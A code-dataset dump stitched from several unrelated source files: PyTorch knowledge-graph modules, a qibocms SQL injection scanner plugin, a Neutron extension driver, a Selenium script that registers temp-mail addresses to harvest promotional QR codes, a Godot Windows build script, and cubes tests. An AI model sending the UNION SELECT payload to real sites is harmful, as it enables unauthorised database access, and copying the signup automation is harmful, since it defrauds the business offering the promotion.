rel_key = self.linear_rels_key(torch.cat([edge_rel_names, edge_rels], -1))
node_name_val = self.linear_node_name_val(node_ent_names)
node_type_val = self.linear_node_type_val(node_type_names)
rel_val = self.linear_rels_val(torch.cat([edge_rel_names, edge_rels], -1))
ent_comp_val = [node_name_val, node_type_val, rel_val]
ent_comp_key = [node_name_key, node_type_key, rel_key]
return ent_comp_val, ent_comp_key
def enc_kg_features(self, x_ent_names, x_ent_name_len, x_type_names, x_types, x_type_name_len, x_rel_names, x_rels, x_rel_name_len, x_rel_mask):
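# Encode entity names, entity type names and relation names with the shared sequence encoders; relation ids are embedded and averaged over each entity's relations.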
node_ent_names = (self.kg_enc_ent(x_ent_names.view(-1, x_ent_names.size(-1)), x_ent_name_len.view(-1))[1]).view(x_ent_names.size(0), x_ent_names.size(1), -1)
node_type_names = (self.kg_enc_type(x_type_names.view(-1, x_type_names.size(-1)), x_type_name_len.view(-1))[1]).view(x_type_names.size(0), x_type_names.size(1), -1)
node_types = None
edge_rel_names = torch.mean((self.kg_enc_rel(x_rel_names.view(-1, x_rel_names.size(-1)), x_rel_name_len.view(-1))[1]).view(x_rel_names.size(0), x_rel_names.size(1), x_rel_names.size(2), -1), 2)
edge_rels = torch.mean(self.relation_embed(x_rels.view(-1, x_rels.size(-1))), 1).view(x_rels.size(0), x_rels.size(1), -1)
if self.ent_enc_dropout:
node_ent_names = F.dropout(node_ent_names, p=self.ent_enc_dropout, training=self.training)
node_type_names = F.dropout(node_type_names, p=self.ent_enc_dropout, training=self.training)
# node_types = F.dropout(node_types, p=self.ent_enc_dropout, training=self.training)
edge_rel_names = F.dropout(edge_rel_names, p=self.ent_enc_dropout, training=self.training)
edge_rels = F.dropout(edge_rels, p=self.ent_enc_dropout, training=self.training)
return node_ent_names, node_type_names, node_types, edge_rel_names, edge_rels
class EntRomHop(nn.Module):
def __init__(self, query_embed_size, in_memory_embed_size, hidden_size, atten_type='add'):
super(EntRomHop, self).__init__()
self.atten = Attention(hidden_size, query_embed_size, in_memory_embed_size, atten_type=atten_type)
self.gru_step = GRUStep(hidden_size, in_memory_embed_size)
def forward(self, h_state, key_memory_embed, val_memory_embed, atten_mask=None):
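# One memory hop: attend over the key memory, read a weighted sum from the value memory, then update the state with a GRU step.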
attention = self.atten(h_state, key_memory_embed, atten_mask=atten_mask)
probs = torch.softmax(attention, dim=-1)
memory_output = torch.bmm(probs.unsqueeze(1), val_memory_embed).squeeze(1)
h_state = self.gru_step(h_state, memory_output)
return h_state
class GRUStep(nn.Module):
def __init__(self, hidden_size, input_size):
super(GRUStep, self).__init__()
'''GRU module'''
self.linear_z = nn.Linear(hidden_size + input_size, hidden_size, bias=False)
self.linear_r = nn.Linear(hidden_size + input_size, hidden_size, bias=False)
self.linear_t = nn.Linear(hidden_size + input_size, hidden_size, bias=False)
def forward(self, h_state, input_):
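# Standard GRU gating: z is the update gate, r the reset gate, t the candidate state.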
z = torch.sigmoid(self.linear_z(torch.cat([h_state, input_], -1)))
r = torch.sigmoid(self.linear_r(torch.cat([h_state, input_], -1)))
t = torch.tanh(self.linear_t(torch.cat([r * h_state, input_], -1)))
h_state = (1 - z) * h_state + z * t
return h_state
| 49.746667
| 219
| 0.642902
|
54bf56cbaa6500439e9e26a8b685b6dd52abaaad
| 1,204
|
py
|
Python
|
scanner/plugins/cms/qibocms/qibocms_js_f_id_sqli.py
|
UgOrange/onlinetools
|
06205282965395e37fb3a7fed806682196ad9ccc
|
[
"MIT"
] | 1,207
|
2018-01-31T06:36:34.000Z
|
2022-03-31T07:35:35.000Z
|
scanner/plugins/cms/qibocms/qibocms_js_f_id_sqli.py
|
UgOrange/onlinetools
|
06205282965395e37fb3a7fed806682196ad9ccc
|
[
"MIT"
] | 21
|
2018-07-30T03:01:49.000Z
|
2022-03-28T08:20:39.000Z
|
scanner/plugins/cms/qibocms/qibocms_js_f_id_sqli.py
|
UgOrange/onlinetools
|
06205282965395e37fb3a7fed806682196ad9ccc
|
[
"MIT"
] | 310
|
2018-02-22T01:23:20.000Z
|
2022-03-28T08:51:37.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: qibocms news/js.php f_id parameter SQL injection
referer: http://www.wooyun.org/bugs/wooyun-2014-075317
author: Lucifer
description: The f_id parameter in /news/js.php is vulnerable to SQL injection.
'''
import sys
import requests
class qibocms_js_f_id_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/news/js.php?f_id=1)%20UnIoN%20SeLeCt%201,Md5(1234),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23&type=hot"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]存在qibocms news/js.php文件参数f_idSQL注入漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = qibocms_js_f_id_sqli_BaseVerify(sys.argv[1])
testVuln.run()
| 34.4
| 223
| 0.647841
|
e3b1b536afba592a87c99ccbe30574f382de6676
| 1,771
|
py
|
Python
|
gbpservice/neutron/services/grouppolicy/drivers/extensions/aim_mapping_extension_driver.py
|
ashutosh-mishra/my-test
|
51c82af293f291b9182204392e7d21bda27786d1
|
[
"Apache-2.0"
] | null | null | null |
gbpservice/neutron/services/grouppolicy/drivers/extensions/aim_mapping_extension_driver.py
|
ashutosh-mishra/my-test
|
51c82af293f291b9182204392e7d21bda27786d1
|
[
"Apache-2.0"
] | null | null | null |
gbpservice/neutron/services/grouppolicy/drivers/extensions/aim_mapping_extension_driver.py
|
ashutosh-mishra/my-test
|
51c82af293f291b9182204392e7d21bda27786d1
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron._i18n import _LI
from neutron import manager as n_manager
from oslo_log import log as logging
from gbpservice.neutron.extensions import aim_driver_ext
from gbpservice.neutron.services.grouppolicy import (
group_policy_driver_api as api)
LOG = logging.getLogger(__name__)
class AIMExtensionDriver(api.ExtensionDriver):
_supported_extension_alias = aim_driver_ext.AIM_DRIVER_EXT
_extension_dict = aim_driver_ext.EXTENDED_ATTRIBUTES_2_0
def __init__(self):
LOG.info(_LI("AIM Extension __init__"))
self._policy_driver = None
@property
def _pd(self):
if not self._policy_driver:
gbp_plugin = (n_manager.NeutronManager.get_service_plugins()
.get("GROUP_POLICY"))
policy_mgr = gbp_plugin.policy_driver_manager
self._policy_driver = policy_mgr.policy_drivers['aim_mapping'].obj
return self._policy_driver
def initialize(self):
pass
@property
def extension_alias(self):
return self._supported_extension_alias
def extend_policy_target_group_dict(self, session, result):
self._pd.extend_policy_target_group_dict(session, result)
| 35.42
| 78
| 0.728402
|
5bedb0b5d6e4acbb2c6e26d715ba802d2ea48d64
| 4,580
|
py
|
Python
|
tomato.py
|
au5ton/tomato
|
324701c1ca89eaf51d1bea8156f7db7334a36211
|
[
"MIT"
] | null | null | null |
tomato.py
|
au5ton/tomato
|
324701c1ca89eaf51d1bea8156f7db7334a36211
|
[
"MIT"
] | null | null | null |
tomato.py
|
au5ton/tomato
|
324701c1ca89eaf51d1bea8156f7db7334a36211
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())
import requests
import os
import os.path
import re
import argparse
from time import sleep
from selenium import webdriver
import selenium.webdriver.support.ui as ui
from selenium.webdriver.common.keys import Keys
import platform
IS_MACOS = platform.system() == 'Darwin' # Define boolean for if the platform is macOS or not, useful for Keys.COMMAND vs Keys.CONTROl
PROJECT_DIRECTORY = os.path.split(os.path.realpath(__file__))[0]
def do_automation():
# selenium stuff
options = webdriver.ChromeOptions()
# uncomment to maintain cookies between sessions
#options.add_argument("user-data-dir=" + os.environ["CHROME_USER_DATA_DIR"]) # use already logged in user
options.add_argument('--log-level=3')
options.add_argument('--disable-logging')
print("\tStarted Chrome")
browser = webdriver.Chrome(executable_path=os.environ["CHROMEDRIVER_LOCATION"], chrome_options=options)
browser.get("https://www.tempmailaddress.com/")
temp_email = browser.find_element_by_id("email").text
print("\ttemp email: "+temp_email)
# opens and loads new arcade homepage
print("\tOpening Arcade homepage")
browser.execute_script("window.open('');")
browser.implicitly_wait(2)
browser.switch_to.window(browser.window_handles[1])
browser.get(os.environ["ARCADE_HOMEPAGE"])
browser.implicitly_wait(5)
# subscribes user on arcade homepage
print("\tSubscribing temp email")
form_element = browser.find_element_by_name("footerEmailForm")
form_input_element = browser.find_element_by_name("footerInputEmai1")
form_submit_button = browser.find_element_by_css_selector("form[name=\"footerEmailForm\"] input[type=\"submit\"]")
browser.execute_script("arguments[0].scrollIntoView();", form_input_element)
form_input_element.send_keys(temp_email)
form_submit_button.click()
sleep(5)
browser.close()
# back to tempmailaddress.com, previous tab
browser.switch_to.window(browser.window_handles[0])
browser.implicitly_wait(5)
browser.find_element_by_css_selector("a[href='#refresh']:not(.btn)").click()
sleep(5)
browser.find_element_by_css_selector("#schranka tr[data-href='2'].hidden-xs").click() # opens 2nd email received, subscription confirmation
browser.implicitly_wait(5)
# open individual email
iframe = browser.find_element_by_id('iframeMail')
browser.switch_to_frame(iframe)
browser.find_element_by_css_selector("a.mktbutton").click() # opens subscription signup
browser.implicitly_wait(5)
sleep(5)
# interact with signup form
browser.switch_to.window(browser.window_handles[1]) # switches to 2nd tab
print("\tInjecting MEFormFiller javascript")
browser.execute_script(open("./MEFormFiller.user.js").read())
browser.implicitly_wait(5)
sleep(5)
iframe2 = browser.find_element_by_css_selector('iframe#MarketingMicrositeIfr')
browser.switch_to_frame(iframe2)
browser.find_element_by_css_selector("button[name='ME_TabbedScreenFlow7_pyWorkPage_15']").click()
sleep(5)
browser.find_element_by_css_selector("button[name='ME_TabbedScreenFlow7_pyWorkPage_16']").click()
sleep(5)
browser.close()
browser.switch_to.window(browser.window_handles[0])
sleep(5)
# back to email to claim QR code
browser.switch_to_default_content()
sleep(5)
browser.find_element_by_css_selector("span.glyphicon-share-alt").click()
browser.implicitly_wait(5)
browser.find_element_by_css_selector("#schranka tr[data-href='3'].hidden-xs").click() # opens 3rd email received, gift receipt
browser.implicitly_wait(5)
# open individual email
iframe3 = browser.find_element_by_id('iframeMail')
browser.switch_to_frame(iframe3)
qr_code = browser.find_element_by_css_selector("img.cursordefault").get_attribute("src")
print("\tQR code: "+qr_code)
r = requests.get(qr_code, allow_redirects=True)
open(os.path.basename(qr_code), 'wb').write(r.content)
print("Saved to: "+os.path.basename(qr_code))
browser.switch_to_default_content()
browser.close()
return
# cli arguments
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store", dest="count", default="3", help="Specify card count as an integer")
args = parser.parse_args()
if args.count is None:
print("Must specify count with -L, see --help")
exit(1)
for i in range(1,int(args.count)+1):
print("Card [{}/{}]:".format(str(i), str(int(args.count))))
do_automation()
| 39.482759
| 143
| 0.74083
|
7a45211e8925177a09c3c169308916367f818d58
| 3,197
|
py
|
Python
|
tests/test_namespace.py
|
digitalsatori/cubes
|
140133e8c2e3f2ff60631cc3ebc9966d16c1655e
|
[
"MIT"
] | 1,020
|
2015-01-02T03:05:26.000Z
|
2022-02-12T18:48:51.000Z
|
tests/test_namespace.py
|
zshwuhan/cubes
|
6d83f04acb34eeb0b904dd1af0e97eda6621bf6c
|
[
"MIT"
] | 259
|
2015-01-02T22:35:14.000Z
|
2021-09-02T04:20:41.000Z
|
tests/test_namespace.py
|
zshwuhan/cubes
|
6d83f04acb34eeb0b904dd1af0e97eda6621bf6c
|
[
"MIT"
] | 288
|
2015-01-08T00:42:26.000Z
|
2022-03-31T17:25:10.000Z
|
import unittest
from cubes.namespace import Namespace
# from .common import CubesTestCaseBase
class NamespaceTestCase(unittest.TestCase):
def test_create(self):
ns = Namespace()
ns.create_namespace("slicer")
self.assertIn("slicer", ns.namespaces)
self.assertIsInstance(ns.namespaces["slicer"], Namespace)
def test_get_namespace(self):
base = Namespace()
slicerns = base.create_namespace("slicer")
self.assertEqual((base, None), base.namespace(""))
self.assertEqual((slicerns, None), base.namespace("slicer"))
self.assertEqual((base, "unknown"), base.namespace("unknown"))
self.assertEqual((base, "one.two"), base.namespace("one.two"))
def test_get_namespace_create(self):
base = Namespace()
slicerns = base.create_namespace("slicer")
self.assertEqual((base, None), base.namespace("", create=True))
self.assertEqual((slicerns, None), base.namespace("slicer", create=True))
(ns, remainder) = base.namespace("new", create=True)
self.assertEqual(None, remainder)
self.assertEqual((ns, None), base.namespace("new"))
(last, remainder) = base.namespace("one.two.three", create=True)
self.assertEqual(None, remainder)
self.assertIn("one", base.namespaces)
(ns, remainder) = base.namespace("one")
self.assertEqual(None, remainder)
self.assertIn("two", ns.namespaces)
(ns, remainder) = ns.namespace("two")
self.assertEqual(None, remainder)
self.assertIn("three", ns.namespaces)
(ns, remainder) = ns.namespace("three")
self.assertEqual(None, remainder)
(last, remainder) = base.namespace("one.two.three.four.five")
self.assertEqual("four.five", remainder)
@unittest.skip("We need some fake provider to test this")
def test_find_cube(self):
base = Namespace()
(ns, nsname, basename) = base.find_cube("cube")
self.assertEqual(ns, base)
self.assertEqual(nsname, "")
self.assertEqual(basename, "cube")
(ns, nsname, basename) = base.find_cube("extern.cube")
self.assertEqual(ns, base)
self.assertEqual(nsname, "")
self.assertEqual(basename, "extern.cube")
(ns, nsname, basename) = base.find_cube("even.deeper.extern.cube")
self.assertEqual(ns, base)
self.assertEqual(nsname, "")
self.assertEqual(basename, "even.deeper.extern.cube")
extern = base.create_namespace("extern")
(ns, nsname, basename) = base.find_cube("extern.cube")
self.assertEqual(ns, extern)
self.assertEqual(nsname, "")
self.assertEqual(basename, "cube")
(ns, nsname, basename) = base.find_cube("extern.deeper.cube")
self.assertEqual(ns, extern)
self.assertEqual(nsname, 'extern')
self.assertEqual(basename, "deeper.cube")
(deep, remainder) = base.namespace("even.deeper.extern", create=True)
(ns, nsname, basename) = base.find_cube("even.deeper.extern.cube")
self.assertEqual(ns, deep)
self.assertEqual(nsname, "")
self.assertEqual(basename, "cube")
| 37.174419
| 81
| 0.639037
|
72c3f60d99675915eb1fefadad0b7de2d22445e6
| 15,203
|
py
|
Python
|
platform/windows/detect.py
|
ericmccarthy7/godot
|
42f04cbc1a59772a5f7eca9c6847fa349b23a70e
|
[
"CC-BY-3.0",
"Apache-2.0",
"MIT"
] | 5
|
2018-08-18T15:06:49.000Z
|
2021-12-12T10:16:09.000Z
|
platform/windows/detect.py
|
ericmccarthy7/godot
|
42f04cbc1a59772a5f7eca9c6847fa349b23a70e
|
[
"CC-BY-3.0",
"Apache-2.0",
"MIT"
] | 18
|
2018-08-18T16:27:27.000Z
|
2021-12-12T13:31:33.000Z
|
platform/windows/detect.py
|
ericmccarthy7/godot
|
42f04cbc1a59772a5f7eca9c6847fa349b23a70e
|
[
"CC-BY-3.0",
"Apache-2.0",
"MIT"
] | 1
|
2020-08-13T18:03:24.000Z
|
2020-08-13T18:03:24.000Z
|
import methods
import os
import SCons.Errors  # needed for the UserError raised in setup_msvc_manual()
def is_active():
return True
def get_name():
return "Windows"
def can_build():
if (os.name == "nt"):
# Building natively on Windows
# If VCINSTALLDIR is set in the OS environ, use traditional Godot logic to set up MSVC
if (os.getenv("VCINSTALLDIR")): # MSVC, manual setup
return True
# Otherwise, let SCons find MSVC if installed, or else Mingw.
# Since we're just returning True here, if there's no compiler
# installed, we'll get errors when it tries to build with the
# null compiler.
return True
if (os.name == "posix"):
# Cross-compiling with MinGW-w64 (old MinGW32 is not supported)
mingw32 = "i686-w64-mingw32-"
mingw64 = "x86_64-w64-mingw32-"
if (os.getenv("MINGW32_PREFIX")):
mingw32 = os.getenv("MINGW32_PREFIX")
if (os.getenv("MINGW64_PREFIX")):
mingw64 = os.getenv("MINGW64_PREFIX")
test = "gcc --version > /dev/null 2>&1"
if (os.system(mingw64 + test) == 0 or os.system(mingw32 + test) == 0):
return True
return False
def get_opts():
from SCons.Variables import BoolVariable, EnumVariable
mingw32 = ""
mingw64 = ""
if (os.name == "posix"):
mingw32 = "i686-w64-mingw32-"
mingw64 = "x86_64-w64-mingw32-"
if (os.getenv("MINGW32_PREFIX")):
mingw32 = os.getenv("MINGW32_PREFIX")
if (os.getenv("MINGW64_PREFIX")):
mingw64 = os.getenv("MINGW64_PREFIX")
return [
('mingw_prefix_32', 'MinGW prefix (Win32)', mingw32),
('mingw_prefix_64', 'MinGW prefix (Win64)', mingw64),
# Targeted Windows version: 7 (and later), minimum supported version
# XP support dropped after EOL due to missing API for IPv6 and other issues
# Vista support dropped after EOL due to GH-10243
('target_win_version', 'Targeted Windows version, >= 0x0601 (Windows 7)', '0x0601'),
EnumVariable('debug_symbols', 'Add debugging symbols to release builds', 'yes', ('yes', 'no', 'full')),
BoolVariable('separate_debug_symbols', 'Create a separate file containing debugging symbols', False),
('msvc_version', 'MSVC version to use. Ignored if VCINSTALLDIR is set in shell env.', None),
BoolVariable('use_mingw', 'Use the Mingw compiler, even if MSVC is installed. Only used on Windows.', False),
BoolVariable('use_llvm', 'Use the LLVM compiler', False),
BoolVariable('use_thinlto', 'Use ThinLTO', False),
]
def get_flags():
return [
]
def build_res_file(target, source, env):
if (env["bits"] == "32"):
cmdbase = env['mingw_prefix_32']
else:
cmdbase = env['mingw_prefix_64']
cmdbase = cmdbase + 'windres --include-dir . '
import subprocess
for x in range(len(source)):
cmd = cmdbase + '-i ' + str(source[x]) + ' -o ' + str(target[x])
try:
out = subprocess.Popen(cmd, shell=True, stderr=subprocess.PIPE).communicate()
if len(out[1]):
return 1
except:
return 1
return 0
def setup_msvc_manual(env):
"""Set up env to use MSVC manually, using VCINSTALLDIR"""
if (env["bits"] != "default"):
print("""
Bits argument is not supported for MSVC compilation. Architecture depends on the Native/Cross Compile Tools Prompt/Developer Console
(or Visual Studio settings) that is being used to run SCons. As a consequence, bits argument is disabled. Run scons again without bits
argument (example: scons p=windows) and SCons will attempt to detect what MSVC compiler will be executed and inform you.
""")
raise SCons.Errors.UserError("Bits argument should not be used when using VCINSTALLDIR")
# Force bits arg
# (Actually msys2 mingw can support 64-bit, we could detect that)
env["bits"] = "32"
env["x86_libtheora_opt_vc"] = True
# find compiler manually
compiler_version_str = methods.detect_visual_c_compiler_version(env['ENV'])
print("Found MSVC compiler: " + compiler_version_str)
# If building for 64bit architecture, disable assembly optimisations for 32 bit builds (theora as of writing)... vc compiler for 64bit can not compile _asm
if(compiler_version_str == "amd64" or compiler_version_str == "x86_amd64"):
env["bits"] = "64"
env["x86_libtheora_opt_vc"] = False
print("Compiled program architecture will be a 64 bit executable (forcing bits=64).")
elif (compiler_version_str == "x86" or compiler_version_str == "amd64_x86"):
print("Compiled program architecture will be a 32 bit executable. (forcing bits=32).")
else:
print("Failed to manually detect MSVC compiler architecture version... Defaulting to 32bit executable settings (forcing bits=32). Compilation attempt will continue, but SCons can not detect for what architecture this build is compiled for. You should check your settings/compilation setup, or avoid setting VCINSTALLDIR.")
def setup_msvc_auto(env):
"""Set up MSVC using SCons's auto-detection logic"""
# If MSVC_VERSION is set by SCons, we know MSVC is installed.
# But we may want a different version or target arch.
# The env may have already been set up with default MSVC tools, so
# reset a few things so we can set it up with the tools we want.
# (Ideally we'd decide on the tool config before configuring any
# environment, and just set the env up once, but this function runs
# on an existing env so this is the simplest way.)
env['MSVC_SETUP_RUN'] = False # Need to set this to re-run the tool
env['MSVS_VERSION'] = None
env['MSVC_VERSION'] = None
env['TARGET_ARCH'] = None
if env['bits'] != 'default':
env['TARGET_ARCH'] = {'32': 'x86', '64': 'x86_64'}[env['bits']]
if env.has_key('msvc_version'):
env['MSVC_VERSION'] = env['msvc_version']
env.Tool('msvc')
env.Tool('mssdk') # we want the MS SDK
# Note: actual compiler version can be found in env['MSVC_VERSION'], e.g. "14.1" for VS2015
# Get actual target arch into bits (it may be "default" at this point):
if env['TARGET_ARCH'] in ('amd64', 'x86_64'):
env['bits'] = '64'
else:
env['bits'] = '32'
print("Found MSVC version %s, arch %s, bits=%s" % (env['MSVC_VERSION'], env['TARGET_ARCH'], env['bits']))
if env['TARGET_ARCH'] in ('amd64', 'x86_64'):
env["x86_libtheora_opt_vc"] = False
def setup_mingw(env):
"""Set up env for use with mingw"""
# Nothing to do here
print("Using MinGW")
pass
def configure_msvc(env, manual_msvc_config):
"""Configure env to work with MSVC"""
# Build type
if (env["target"] == "release"):
if (env["optimize"] == "speed"): #optimize for speed (default)
env.Append(CCFLAGS=['/O2'])
else: # optimize for size
env.Append(CCFLAGS=['/O1'])
env.Append(LINKFLAGS=['/SUBSYSTEM:WINDOWS'])
env.Append(LINKFLAGS=['/ENTRY:mainCRTStartup'])
env.Append(LINKFLAGS=['/OPT:REF'])
elif (env["target"] == "release_debug"):
if (env["optimize"] == "speed"): #optimize for speed (default)
env.Append(CCFLAGS=['/O2'])
else: # optimize for size
env.Append(CCFLAGS=['/O1'])
env.AppendUnique(CPPDEFINES = ['DEBUG_ENABLED'])
env.Append(LINKFLAGS=['/SUBSYSTEM:CONSOLE'])
env.Append(LINKFLAGS=['/OPT:REF'])
elif (env["target"] == "debug"):
env.AppendUnique(CCFLAGS=['/Z7', '/Od', '/EHsc'])
env.AppendUnique(CPPDEFINES = ['DEBUG_ENABLED', 'DEBUG_MEMORY_ENABLED',
'D3D_DEBUG_INFO'])
env.Append(LINKFLAGS=['/SUBSYSTEM:CONSOLE'])
env.Append(LINKFLAGS=['/DEBUG'])
if (env["debug_symbols"] == "full" or env["debug_symbols"] == "yes"):
env.AppendUnique(CCFLAGS=['/Z7'])
env.AppendUnique(LINKFLAGS=['/DEBUG'])
## Compile/link flags
env.AppendUnique(CCFLAGS=['/MT', '/Gd', '/GR', '/nologo'])
if int(env['MSVC_VERSION'].split('.')[0]) >= 14: #vs2015 and later
env.AppendUnique(CCFLAGS=['/utf-8'])
env.AppendUnique(CXXFLAGS=['/TP']) # assume all sources are C++
if manual_msvc_config: # should be automatic if SCons found it
if os.getenv("WindowsSdkDir") is not None:
env.Prepend(CPPPATH=[os.getenv("WindowsSdkDir") + "/Include"])
else:
print("Missing environment variable: WindowsSdkDir")
env.AppendUnique(CPPDEFINES = ['WINDOWS_ENABLED', 'OPENGL_ENABLED',
'WASAPI_ENABLED', 'WINMIDI_ENABLED',
'TYPED_METHOD_BIND',
'WIN32', 'MSVC',
'WINVER=%s' % env["target_win_version"],
'_WIN32_WINNT=%s' % env["target_win_version"]])
env.AppendUnique(CPPDEFINES=['NOMINMAX']) # disable bogus min/max WinDef.h macros
if env["bits"] == "64":
env.AppendUnique(CPPDEFINES=['_WIN64'])
## Libs
LIBS = ['winmm', 'opengl32', 'dsound', 'kernel32', 'ole32', 'oleaut32',
'user32', 'gdi32', 'IPHLPAPI', 'Shlwapi', 'wsock32', 'Ws2_32',
'shell32', 'advapi32', 'dinput8', 'dxguid', 'imm32', 'bcrypt','Avrt',
'dwmapi']
env.Append(LINKFLAGS=[p + env["LIBSUFFIX"] for p in LIBS])
if manual_msvc_config:
if os.getenv("WindowsSdkDir") is not None:
env.Append(LIBPATH=[os.getenv("WindowsSdkDir") + "/Lib"])
else:
print("Missing environment variable: WindowsSdkDir")
## LTO
if (env["use_lto"]):
env.AppendUnique(CCFLAGS=['/GL'])
env.AppendUnique(ARFLAGS=['/LTCG'])
if env["progress"]:
env.AppendUnique(LINKFLAGS=['/LTCG:STATUS'])
else:
env.AppendUnique(LINKFLAGS=['/LTCG'])
if manual_msvc_config:
env.Prepend(CPPPATH=[p for p in os.getenv("INCLUDE").split(";")])
env.Append(LIBPATH=[p for p in os.getenv("LIB").split(";")])
# Incremental linking fix
env['BUILDERS']['ProgramOriginal'] = env['BUILDERS']['Program']
env['BUILDERS']['Program'] = methods.precious_program
def configure_mingw(env):
# Workaround for MinGW. See:
# http://www.scons.org/wiki/LongCmdLinesOnWin32
env.use_windows_spawn_fix()
## Build type
if (env["target"] == "release"):
env.Append(CCFLAGS=['-msse2'])
if (env["optimize"] == "speed"): #optimize for speed (default)
if (env["bits"] == "64"):
env.Append(CCFLAGS=['-O3'])
else:
env.Append(CCFLAGS=['-O2'])
else: #optimize for size
env.Prepend(CCFLAGS=['-Os'])
env.Append(LINKFLAGS=['-Wl,--subsystem,windows'])
if (env["debug_symbols"] == "yes"):
env.Prepend(CCFLAGS=['-g1'])
if (env["debug_symbols"] == "full"):
env.Prepend(CCFLAGS=['-g2'])
elif (env["target"] == "release_debug"):
env.Append(CCFLAGS=['-O2'])
env.Append(CPPDEFINES=['DEBUG_ENABLED'])
if (env["debug_symbols"] == "yes"):
env.Prepend(CCFLAGS=['-g1'])
if (env["debug_symbols"] == "full"):
env.Prepend(CCFLAGS=['-g2'])
if (env["optimize"] == "speed"): #optimize for speed (default)
env.Append(CCFLAGS=['-O2'])
else: #optimize for size
env.Prepend(CCFLAGS=['-Os'])
elif (env["target"] == "debug"):
env.Append(CCFLAGS=['-g3'])
env.Append(CPPDEFINES=['DEBUG_ENABLED', 'DEBUG_MEMORY_ENABLED'])
## Compiler configuration
if os.name != "nt":
env["PROGSUFFIX"] = env["PROGSUFFIX"] + ".exe" # for linux cross-compilation
if (env["bits"] == "default"):
if (os.name == "nt"):
env["bits"] = "64" if "PROGRAMFILES(X86)" in os.environ else "32"
else: # default to 64-bit on Linux
env["bits"] = "64"
mingw_prefix = ""
if (env["bits"] == "32"):
env.Append(LINKFLAGS=['-static'])
env.Append(LINKFLAGS=['-static-libgcc'])
env.Append(LINKFLAGS=['-static-libstdc++'])
mingw_prefix = env["mingw_prefix_32"]
else:
env.Append(LINKFLAGS=['-static'])
mingw_prefix = env["mingw_prefix_64"]
if env['use_llvm']:
env["CC"] = mingw_prefix + "clang"
env['AS'] = mingw_prefix + "as"
env["CXX"] = mingw_prefix + "clang++"
env['AR'] = mingw_prefix + "ar"
env['RANLIB'] = mingw_prefix + "ranlib"
env["LINK"] = mingw_prefix + "clang++"
else:
env["CC"] = mingw_prefix + "gcc"
env['AS'] = mingw_prefix + "as"
env['CXX'] = mingw_prefix + "g++"
env['AR'] = mingw_prefix + "gcc-ar"
env['RANLIB'] = mingw_prefix + "gcc-ranlib"
env['LINK'] = mingw_prefix + "g++"
env["x86_libtheora_opt_gcc"] = True
if env['use_lto']:
if not env['use_llvm'] and env.GetOption("num_jobs") > 1:
env.Append(CCFLAGS=['-flto'])
env.Append(LINKFLAGS=['-flto=' + str(env.GetOption("num_jobs"))])
else:
if env['use_thinlto']:
env.Append(CCFLAGS=['-flto=thin'])
env.Append(LINKFLAGS=['-flto=thin'])
else:
env.Append(CCFLAGS=['-flto'])
env.Append(LINKFLAGS=['-flto'])
## Compile flags
env.Append(CCFLAGS=['-mwindows'])
env.Append(CPPDEFINES=['WINDOWS_ENABLED', 'OPENGL_ENABLED', 'WASAPI_ENABLED', 'WINMIDI_ENABLED'])
env.Append(CPPDEFINES=[('WINVER', env['target_win_version']), ('_WIN32_WINNT', env['target_win_version'])])
env.Append(LIBS=['mingw32', 'opengl32', 'dsound', 'ole32', 'd3d9', 'winmm', 'gdi32', 'iphlpapi', 'shlwapi', 'wsock32', 'ws2_32', 'kernel32', 'oleaut32', 'dinput8', 'dxguid', 'ksuser', 'imm32', 'bcrypt', 'avrt', 'uuid', 'dwmapi'])
env.Append(CPPDEFINES=['MINGW_ENABLED', ('MINGW_HAS_SECURE_API', 1)])
# resrc
env.Append(BUILDERS={'RES': env.Builder(action=build_res_file, suffix='.o', src_suffix='.rc')})
def configure(env):
# At this point the env has been set up with basic tools/compilers.
env.Prepend(CPPPATH=['#platform/windows'])
print("Configuring for Windows: target=%s, bits=%s" % (env['target'], env['bits']))
if (os.name == "nt"):
env['ENV'] = os.environ # this makes build less repeatable, but simplifies some things
env['ENV']['TMP'] = os.environ['TMP']
# First figure out which compiler, version, and target arch we're using
if os.getenv("VCINSTALLDIR") and not env["use_mingw"]:
# Manual setup of MSVC
setup_msvc_manual(env)
env.msvc = True
manual_msvc_config = True
elif env.get('MSVC_VERSION', '') and not env["use_mingw"]:
setup_msvc_auto(env)
env.msvc = True
manual_msvc_config = False
else:
setup_mingw(env)
env.msvc = False
# Now set compiler/linker flags
if env.msvc:
configure_msvc(env, manual_msvc_config)
else: # MinGW
configure_mingw(env)
| 39.284238
| 330
| 0.60021
|
f8c0dcbe0db7df65069f175537bc73babfc15c04
| 2,751
|
py
|
Python
|
src/medford.py
|
infispiel/MEDFORD
|
a5f1523be53690aa20dae19add44c27ad1a254a4
|
[
"MIT"
] | 3
|
2021-02-24T17:10:10.000Z
|
2021-05-07T15:32:16.000Z
|
src/medford.py
|
infispiel/MEDFORD
|
a5f1523be53690aa20dae19add44c27ad1a254a4
|
[
"MIT"
] | 4
|
2021-10-08T17:03:26.000Z
|
2022-01-21T14:43:19.000Z
|
src/medford.py
|
infispiel/MEDFORD
|
a5f1523be53690aa20dae19add44c27ad1a254a4
|
[
"MIT"
] | null | null | null |
from medford_detailparser import *
from medford_detail import *
from medford_models import BCODMO, Entity
from medford_BagIt import runBagitMode, BagIt
import json
import argparse
from enum import Enum, auto
class MFDMode(Enum) :
